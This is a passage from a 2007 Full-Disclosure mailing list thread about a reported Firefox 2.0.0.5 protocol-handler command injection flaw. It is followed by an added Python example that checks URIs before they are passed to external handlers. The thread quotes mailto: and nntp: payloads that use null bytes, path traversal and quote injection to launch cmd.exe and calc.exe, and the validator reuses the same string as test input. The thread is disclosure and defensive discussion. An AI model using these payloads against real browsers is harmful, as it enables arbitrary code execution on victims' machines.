Check out our blog on xs-sniper.com. There's more info there. This flaw does somewhat depend upon what you have installed, as is referenced on our blog page. Keep in mind that the URIs are tied to commands through the registry, and that those commands are where the command injections go. If you have a different command from what we have, then of course there's the chance it doesn't work.

Thanks,
Nate

On 7/25/07, Mesut EREN <[EMAIL PROTECTED]> wrote:
> Hi all,
>
> FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But
> the code doesn't work.
>
> Example code is
>
> mailto:%00%00../../../../../../windows/system32/cmd".exe
> ../../../../../../../../windows/system32/calc.exe " - "
> blah.bat
>
> nntp:%00%00../../../../../../windows/system32/cmd".exe
> ../../../../../../../../windows/system32/calc.exe " - "
> blah.bat
>
> What am I missing?
>
> Mesut EREN
> BAŞAK ÇATI & CEPHE SİSTEMLERİ
> Bilgi İşlem Sorumlusu
>
> MCSA:S,MCSE:S,CEH,CCNA
>
> [EMAIL PROTECTED]
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
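
The point made in the reply above, that a URI is substituted into a registry-defined command line, is why an application should check a URI before handing it to an external protocol handler. The following is an added example, not part of the original messages or the researchers' code: the handler command in `TEMPLATE` is constructed, the strict character policy is an assumption, and `PAGE_URI` is the `mailto:` string quoted in the thread with its wrapped lines rejoined by spaces.

```python
from urllib.parse import unquote_to_bytes

# Assumed policy: a URI bound for a handler command line must not carry
# control bytes, a double quote, or (in raw form) a literal space.
CONTROL = set(range(0x00, 0x20)) | {0x7F}
RAW_FORBIDDEN = CONTROL | {0x20, 0x22}   # literal space or double quote
DECODED_FORBIDDEN = CONTROL | {0x22}     # %00, %0a, %22 ... once decoded


def handler_uri_problems(uri):
    """List the reasons a URI should not reach an external protocol handler."""
    checks = (
        ("raw", uri.encode("utf-8", "replace"), RAW_FORBIDDEN),
        ("percent-decoded", unquote_to_bytes(uri), DECODED_FORBIDDEN),
    )
    problems = []
    for label, data, forbidden in checks:
        bad = sorted(set(data) & forbidden)
        if bad:
            found = ", ".join("0x%02x" % b for b in bad)
            problems.append("%s form contains %s" % (label, found))
    return problems


def build_handler_command(template, uri):
    """Substitute the URI for %1 only if it passed every check."""
    problems = handler_uri_problems(uri)
    if problems:
        raise ValueError("; ".join(problems))
    return template.replace("%1", uri)


# Constructed handler command of the kind stored under a protocol's
# shell\open\command registry key; the program path is hypothetical.
TEMPLATE = r'"C:\Program Files\ExampleMail\mail.exe" -compose "%1"'

# The mailto: string from the quoted message, wrapped lines rejoined.
PAGE_URI = ('mailto:%00%00../../../../../../windows/system32/cmd".exe '
            '../../../../../../../../windows/system32/calc.exe " - " blah.bat')

# Constructed benign input.
BENIGN_URI = "mailto:user@example.com?subject=hello%20there"

if __name__ == "__main__":
    for uri in (BENIGN_URI, PAGE_URI):
        print(uri[:40], "->", handler_uri_problems(uri) or "ok")
```
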
